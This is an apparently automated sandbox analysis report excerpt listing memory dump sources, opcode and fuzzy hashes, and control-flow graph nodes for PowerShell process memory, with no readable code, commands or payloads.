                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000009.00000002.2051962362.00007FFAACB90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACB90000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_7ffaacb90000_powershell.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: bc52003039154ac021c2ed0c496ccf22271b00d89f7c822d9f145b7c4baee5ec
                                                                                                                                                                                                                                  • Instruction ID: 437dee0b30f4e4d559ec73793b7dc38be05dc3abe0349bb7251b26ebbc850736
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: bc52003039154ac021c2ed0c496ccf22271b00d89f7c822d9f145b7c4baee5ec
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 27110230B1DA198BAB98E72CC44567A77C1EB9A351B14463FD40EC36A1CE6BE8468381
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000009.00000002.2051962362.00007FFAACB90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACB90000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_7ffaacb90000_powershell.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: e03bb2c29909411e426d32e5bdaa93b1505afda98c240c5a3b7d6880bf6c5c72
                                                                                                                                                                                                                                  • Instruction ID: 42c353913261963ebe68e43210b327905752b3b7be7298da0b494370528e4e23
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e03bb2c29909411e426d32e5bdaa93b1505afda98c240c5a3b7d6880bf6c5c72
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 60019B72F0C6184BF75C9A5CB4062B973C1E7C9625F14423FE58ED3292DE1B981746C5
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000009.00000002.2051962362.00007FFAACB90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACB90000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_7ffaacb90000_powershell.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: be25387111ad63c4fb89f48505213f31df6ecd0f7f52ce10534dcd6ccded5246
                                                                                                                                                                                                                                  • Instruction ID: 2264c5479e02ce91890ff6e3a67c7d7c15a7c475ddb54be5b969495ebf81e03a
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: be25387111ad63c4fb89f48505213f31df6ecd0f7f52ce10534dcd6ccded5246
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2801D672F0C61C8BF75C8A5CA8061B973C1EBCA220F00423FE08EC3292DE2B981742C5
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000009.00000002.2051962362.00007FFAACB90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACB90000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_7ffaacb90000_powershell.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 621a05a3c71fd480b8774548e52915a4a225fb7a6ac629abd1624c68990e22cd
                                                                                                                                                                                                                                  • Instruction ID: c4c558c863a4c81cfa20e17e4b67fa1060cee4fa811b1089e1d1c9bed783babc
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 621a05a3c71fd480b8774548e52915a4a225fb7a6ac629abd1624c68990e22cd
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C821423050D9598FDB55EB28C454F617BE1EF56304F1944EAD04ECB2A3DB2AEC85CB40
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000009.00000002.2051962362.00007FFAACB90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACB90000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_7ffaacb90000_powershell.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 2111d59c58157dfa783fb998768f66a0381bd62cc9943403f3219a63d1b02c4e
                                                                                                                                                                                                                                  • Instruction ID: 731c2fd37300006946ce3ac7ac8e33cfa7d582bef6bca5aaa3aa521a783cb8bc
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2111d59c58157dfa783fb998768f66a0381bd62cc9943403f3219a63d1b02c4e
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B801B572F0C61C4BE75C9A5CA8062B973C1E7C9624F04433FE18ED3292DE27981742CA
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000009.00000002.2051962362.00007FFAACB90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACB90000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_7ffaacb90000_powershell.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 7e961453d3f331191bd99133f18bed92962f359910eb40f1dbf251ea90077d83
                                                                                                                                                                                                                                  • Instruction ID: 645f731764365f01408b6d517db03428553fbf0aa879e8d144886a9ae215eee8
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7e961453d3f331191bd99133f18bed92962f359910eb40f1dbf251ea90077d83
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0001286164EA4A4BEB50CBBC98942313BC4DF67221B0901BBD48CC2152EE1BD84D83C0
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000009.00000002.2051962362.00007FFAACB90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACB90000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_7ffaacb90000_powershell.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                                                                                                                                                                                                                  • Instruction ID: 919e112be300baa597454e40d735f91b77d34c4bc3d7f2976906aeef032d5408
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3001677115CB0C8FD748EF0CE451AA6B7E0FB99364F10056DE58AC3691DB36E882CB45
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000009.00000002.2051962362.00007FFAACB90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACB90000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_7ffaacb90000_powershell.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: f477ef1ce727bc83fff550068f7e420bb5e2ec48d40b4d53b7c199ee798c26eb
                                                                                                                                                                                                                                  • Instruction ID: 8716a6b6c8c61f088a8f61a2ef12fe630130d29e6365fa7685786013480d2a1a
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f477ef1ce727bc83fff550068f7e420bb5e2ec48d40b4d53b7c199ee798c26eb
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B2F0C836929A5D86FB105668FC145E87BE0EB86364F050179F40CC31A1D76B9945C287
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.1434055361.00007FFAACB90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACB90000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_7ffaacb90000_powershell.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                                                                                                                                                                                                                  • Instruction ID: 919e112be300baa597454e40d735f91b77d34c4bc3d7f2976906aeef032d5408
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3001677115CB0C8FD748EF0CE451AA6B7E0FB99364F10056DE58AC3691DB36E882CB45
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000D.00000002.2628896063.00007FFAACB80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACB80000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_7ffaacb80000_powershell.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                                                                                                                                                                                                  • Instruction ID: 149a3e7b2706520087821c0477506b7ee278d8f8093681dec26712e1b927a2f4
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6401447111CB088FD748EF0CE451AA6B7E0FB99364F10056DE58AC3691DB26E882CB45

                                                                                                                                                                                                                                  Execution Graph

                                                                                                                                                                                                                                  Execution Coverage:6.8%
                                                                                                                                                                                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                  Signature Coverage:0%
                                                                                                                                                                                                                                  Total number of Nodes:3
                                                                                                                                                                                                                                  Total number of Limit Nodes:0
                                                                                                                                                                                                                                  execution_graph 13134 7ffaacb8c809 13135 7ffaacb8c80f CreateFileW 13134->13135 13137 7ffaacb8c8de 13135->13137

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 0 7ffaacb85f80-7ffaacb8b5c0 5 7ffaacb8b5c2-7ffaacb8b5c7 call 7ffaacb85fe0 0->5 6 7ffaacb8b5cc-7ffaacb8b603 0->6 5->6 9 7ffaacb8b7f4-7ffaacb8b809 6->9 10 7ffaacb8b609-7ffaacb8b614 6->10 17 7ffaacb8b813-7ffaacb8b85e 9->17 18 7ffaacb8b80b-7ffaacb8b812 9->18 11 7ffaacb8b682-7ffaacb8b687 10->11 12 7ffaacb8b616-7ffaacb8b61e 10->12 14 7ffaacb8b6f3-7ffaacb8b6fd 11->14 15 7ffaacb8b689-7ffaacb8b695 11->15 12->9 13 7ffaacb8b624-7ffaacb8b639 12->13 21 7ffaacb8b662-7ffaacb8b66d 13->21 22 7ffaacb8b63b-7ffaacb8b660 13->22 19 7ffaacb8b71f-7ffaacb8b727 14->19 20 7ffaacb8b6ff-7ffaacb8b71d call 7ffaacb86000 14->20 15->9 23 7ffaacb8b69b-7ffaacb8b6ae 15->23 44 7ffaacb8b87b-7ffaacb8b88c 17->44 45 7ffaacb8b860-7ffaacb8b866 17->45 18->17 26 7ffaacb8b72a-7ffaacb8b735 19->26 20->19 21->9 27 7ffaacb8b673-7ffaacb8b680 21->27 22->21 30 7ffaacb8b6b0-7ffaacb8b6b3 22->30 23->26 26->9 28 7ffaacb8b73b-7ffaacb8b756 26->28 27->11 27->12 28->9 31 7ffaacb8b75c-7ffaacb8b76f 28->31 34 7ffaacb8b6b5 30->34 35 7ffaacb8b6bf-7ffaacb8b6c7 30->35 31->9 37 7ffaacb8b775-7ffaacb8b786 31->37 34->35 35->9 36 7ffaacb8b6cd-7ffaacb8b6f2 35->36 37->9 43 7ffaacb8b788-7ffaacb8b797 37->43 46 7ffaacb8b7e2-7ffaacb8b7f3 43->46 47 7ffaacb8b799-7ffaacb8b7a4 43->47 50 7ffaacb8b89d-7ffaacb8b8c0 44->50 51 7ffaacb8b88e-7ffaacb8b899 44->51 48 7ffaacb8b868-7ffaacb8b879 45->48 49 7ffaacb8b8c1-7ffaacb8b8f8 45->49 47->46 57 7ffaacb8b7a6-7ffaacb8b7dd call 7ffaacb86000 47->57 48->44 48->45 60 7ffaacb8b8fa-7ffaacb8b93a 49->60 61 7ffaacb8b94e-7ffaacb8b95f 49->61 57->46 60->61 70 7ffaacb8b93c-7ffaacb8b94c 60->70 64 7ffaacb8b970-7ffaacb8b9a1 61->64 65 7ffaacb8b961-7ffaacb8b96c 61->65 74 7ffaacb8b9a3-7ffaacb8b9a9 64->74 75 7ffaacb8b9f7-7ffaacb8b9fe 64->75 65->64 70->61 70->70 74->75 76 7ffaacb8b9ab-7ffaacb8b9ac 74->76 77 7ffaacb8ba3f-7ffaacb8ba68 75->77 78 7ffaacb8ba00-7ffaacb8ba01 75->78 79 7ffaacb8b9af-7ffaacb8b9b2 76->79 80 7ffaacb8ba04-7ffaacb8ba07 78->80 82 7ffaacb8b9b8-7ffaacb8b9c8 79->82 83 7ffaacb8ba69-7ffaacb8bb32 79->83 80->83 84 7ffaacb8ba09-7ffaacb8ba1a 80->84 85 7ffaacb8b9ca-7ffaacb8b9ec 82->85 86 7ffaacb8b9f0-7ffaacb8b9f5 82->86 99 7ffaacb8bb34-7ffaacb8bb39 83->99 100 7ffaacb8bb3b-7ffaacb8bb3f 83->100 87 7ffaacb8ba36-7ffaacb8ba3d 84->87 88 7ffaacb8ba1c-7ffaacb8ba22 84->88 85->86 86->75 86->79 87->77 87->80 88->83 92 7ffaacb8ba24-7ffaacb8ba32 88->92 92->87 101 7ffaacb8bb42-7ffaacb8bc2c call 7ffaacb84620 99->101 100->101 114 7ffaacb8bc35-7ffaacb8bc39 101->114 115 7ffaacb8bc2e-7ffaacb8bc33 101->115 116 7ffaacb8bc3c-7ffaacb8bc87 114->116 115->116 120 7ffaacb8bc89-7ffaacb8bc8e 116->120 121 7ffaacb8bc90-7ffaacb8bc94 116->121 122 7ffaacb8bc97-7ffaacb8bdb6 120->122 121->122 136 7ffaacb8bdb8-7ffaacb8bdba 122->136 137 7ffaacb8bdbc-7ffaacb8bdd5 122->137 138 7ffaacb8bdd7-7ffaacb8bde5 136->138 137->138 140 7ffaacb8be72-7ffaacb8be9e 138->140 141 7ffaacb8bdeb-7ffaacb8be5c call 7ffaacb86dc8 138->141 142 7ffaacb8bea4-7ffaacb8bf51 call 7ffaacb86d78 140->142 143 7ffaacb8bf58-7ffaacb8bf98 140->143 177 7ffaacb8be5e-7ffaacb8be6b 141->177 178 7ffaacb8be71 141->178 142->143 153 7ffaacb8c089-7ffaacb8c097 call 7ffaacb8c12e 143->153 154 7ffaacb8bf9e-7ffaacb8bfac 143->154 167 7ffaacb8c099-7ffaacb8c0a7 153->167 168 7ffaacb8c0aa-7ffaacb8c0b5 153->168 156 7ffaacb8bfb2-7ffaacb8bfbd 154->156 157 7ffaacb8c041-7ffaacb8c067 154->157 165 7ffaacb8c06c-7ffaacb8c06f 157->165 169 7ffaacb8c082-7ffaacb8c086 165->169 170 7ffaacb8c071-7ffaacb8c081 165->170 167->168 173 7ffaacb8c0b7-7ffaacb8c0fb call 7ffaacb82ed8 168->173 174 7ffaacb8c11b-7ffaacb8c12d 168->174 169->153 170->169 173->174 177->178 178->140
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000F.00000002.2381817457.00007FFAACB80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACB80000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_15_2_7ffaacb80000_powershell.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: b4$b4$d$hM_H
                                                                                                                                                                                                                                  • API String ID: 0-2171717402
                                                                                                                                                                                                                                  • Opcode ID: 09e492df4bcfc93c276a402ba772aa5a8902310839207eeccf00788405fc576f
                                                                                                                                                                                                                                  • Instruction ID: 1459844549c78f6a80feb40372ff9fa589eafd308fc738c7759aabc53d12af7b
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 09e492df4bcfc93c276a402ba772aa5a8902310839207eeccf00788405fc576f
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 178256B1A1DA4ACFE759DB38C855AB577E1FF96300B1481BEC04EC7292DE25E80687C0

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000F.00000002.2381817457.00007FFAACB80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACB80000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_15_2_7ffaacb80000_powershell.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: hM_H
                                                                                                                                                                                                                                  • API String ID: 0-3803223642
                                                                                                                                                                                                                                  • Opcode ID: 75f02bd1ebf4cf7a2d90c4a0fa8fd14a2238ca3aaec995634ba6151aefa1b405
                                                                                                                                                                                                                                  • Instruction ID: 51132ce8f0866d4be0c65551eb39bd9f6c1e6f12aad3ea7f9befbcd38ebbddfb
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 75f02bd1ebf4cf7a2d90c4a0fa8fd14a2238ca3aaec995634ba6151aefa1b405
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C2F14BB1A1DA8A8FF749DB38C815AB577D2EF9A340F0481BED04EC7292DE25DD058780

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000F.00000002.2381817457.00007FFAACB80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACB80000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_15_2_7ffaacb80000_powershell.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: oM_^
                                                                                                                                                                                                                                  • API String ID: 0-2343771058
                                                                                                                                                                                                                                  • Opcode ID: f56b3160f05c41bbb79cb590901f4cc67a2f1e0785447b6239eda17e69e7244d
                                                                                                                                                                                                                                  • Instruction ID: cbb924d096f16af6230046ae1b6bbc5ffae32e51b469082ca387dda082b693c7
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f56b3160f05c41bbb79cb590901f4cc67a2f1e0785447b6239eda17e69e7244d
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0C71CB97B0A93A4AE2007ABDF8495F97780DFC22777084377D28CC9183EE06754B82E4

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000F.00000002.2381817457.00007FFAACB80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACB80000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_15_2_7ffaacb80000_powershell.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: p[
                                                                                                                                                                                                                                  • API String ID: 0-2643120810
                                                                                                                                                                                                                                  • Opcode ID: ead5bde99645f44dac1ac9aed318344dbf97caa100efabb81004f24760cd4b40
                                                                                                                                                                                                                                  • Instruction ID: 4211dc42f336161df0cfcce9b8b84f959f8c2b21be19d36847d295f8964cae2b
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ead5bde99645f44dac1ac9aed318344dbf97caa100efabb81004f24760cd4b40
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E36117B290CA488FEB58DB6CC8596B97BE0EF69310F04427FE04DD3292DF24A9058781

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 412 7ffaacb8c809-7ffaacb8c873 417 7ffaacb8c875-7ffaacb8c87a 412->417 418 7ffaacb8c87d-7ffaacb8c8dc CreateFileW 412->418 417->418 419 7ffaacb8c8e4-7ffaacb8c90c 418->419 420 7ffaacb8c8de 418->420 420->419
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000F.00000002.2381817457.00007FFAACB80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACB80000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_15_2_7ffaacb80000_powershell.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CreateFile
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 823142352-0
                                                                                                                                                                                                                                  • Opcode ID: 2309f4b55c32efbd9f3afd8284e70a79a59b003804a7250a5fedc4595af9c492
                                                                                                                                                                                                                                  • Instruction ID: 794d0f9509e63228ab3bd328f07710f44c1e6b2c0184c11c03fa9469c6769901
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2309f4b55c32efbd9f3afd8284e70a79a59b003804a7250a5fedc4595af9c492
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9A31B17190CA1C8FDB58EF58D849AF9BBE0FB69311F04422EE04DD3251CB71A8058BC1

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 511 7ffaacc5055d-7ffaacc50567 512 7ffaacc5056e-7ffaacc5057f 511->512 513 7ffaacc50569 511->513 514 7ffaacc50581 512->514 515 7ffaacc50586-7ffaacc50597 512->515 513->512 516 7ffaacc5056b 513->516 514->515 517 7ffaacc50583 514->517 518 7ffaacc5059e-7ffaacc505af 515->518 519 7ffaacc50599 515->519 516->512 517->515 521 7ffaacc505b1 518->521 522 7ffaacc505b6-7ffaacc505c7 518->522 519->518 520 7ffaacc5059b 519->520 520->518 521->522 523 7ffaacc505b3 521->523 524 7ffaacc505ce-7ffaacc5068f 522->524 525 7ffaacc505c9 522->525 523->522 529 7ffaacc508a6-7ffaacc50904 524->529 530 7ffaacc50695-7ffaacc5069f 524->530 525->524 526 7ffaacc505cb 525->526 526->524 548 7ffaacc5092f-7ffaacc5093b 529->548 549 7ffaacc50906-7ffaacc5092d 529->549 531 7ffaacc506a1-7ffaacc506b9 530->531 532 7ffaacc506bb-7ffaacc506c8 530->532 531->532 539 7ffaacc506ce-7ffaacc506d1 532->539 540 7ffaacc5083b-7ffaacc50845 532->540 539->540 542 7ffaacc506d7-7ffaacc506df 539->542 543 7ffaacc50847-7ffaacc50857 540->543 544 7ffaacc50858-7ffaacc508a3 540->544 542->529 546 7ffaacc506e5-7ffaacc506ef 542->546 544->529 550 7ffaacc506f1-7ffaacc506ff 546->550 551 7ffaacc50709-7ffaacc5070f 546->551 556 7ffaacc50946-7ffaacc50957 548->556 549->548 550->551 559 7ffaacc50701-7ffaacc50707 550->559 551->540 552 7ffaacc50715-7ffaacc50718 551->552 557 7ffaacc50761 552->557 558 7ffaacc5071a-7ffaacc5072d 552->558 567 7ffaacc50960-7ffaacc5096f 556->567 568 7ffaacc50959 556->568 561 7ffaacc50763-7ffaacc50765 557->561 558->529 569 7ffaacc50733-7ffaacc5073d 558->569 559->551 561->540 565 7ffaacc5076b-7ffaacc5076e 561->565 570 7ffaacc50770-7ffaacc50779 565->570 571 7ffaacc50785-7ffaacc50789 565->571 576 7ffaacc50971 567->576 577 7ffaacc50978-7ffaacc509f5 567->577 568->567 574 7ffaacc5073f-7ffaacc50754 569->574 575 7ffaacc50756-7ffaacc5075f 569->575 570->571 571->540 579 7ffaacc5078f-7ffaacc50795 571->579 574->575 575->561 576->577 592 7ffaacc509f7-7ffaacc50a07 577->592 593 7ffaacc50a68-7ffaacc50a72 577->593 582 7ffaacc507b1-7ffaacc507b7 579->582 583 7ffaacc50797-7ffaacc507a4 579->583 586 7ffaacc507b9-7ffaacc507c6 582->586 587 7ffaacc507d3-7ffaacc507f5 582->587 583->582 590 7ffaacc507a6-7ffaacc507af 583->590 586->587 595 7ffaacc507c8-7ffaacc507d1 586->595 605 7ffaacc507fc-7ffaacc50800 587->605 590->582 601 7ffaacc50a09-7ffaacc50a12 592->601 602 7ffaacc50a14-7ffaacc50a2a 592->602 597 7ffaacc50a7c-7ffaacc50ac1 593->597 598 7ffaacc50a74-7ffaacc50a79 593->598 595->587 603 7ffaacc50a7a-7ffaacc50a7b 598->603 601->602 602->603 612 7ffaacc50a2c-7ffaacc50a65 602->612 611 7ffaacc50807-7ffaacc50810 605->611 614 7ffaacc50829-7ffaacc5083a 611->614 615 7ffaacc50812-7ffaacc50827 611->615 612->593 615->614
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000F.00000002.2384689009.00007FFAACC50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACC50000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_15_2_7ffaacc50000_powershell.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 54b35c5dec999455f08ab70b011257cd043c3eed144031913658b3d84c138f34
                                                                                                                                                                                                                                  • Instruction ID: d97348163e6ba71b27d7e016288755304f9094e60327b93c24beb494bc397f46
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 54b35c5dec999455f08ab70b011257cd043c3eed144031913658b3d84c138f34
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: ED1214A294EBC95FF7568B2858255A47FE0EF53211B0941FFD08DC71A3DA189C4AC3D2

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
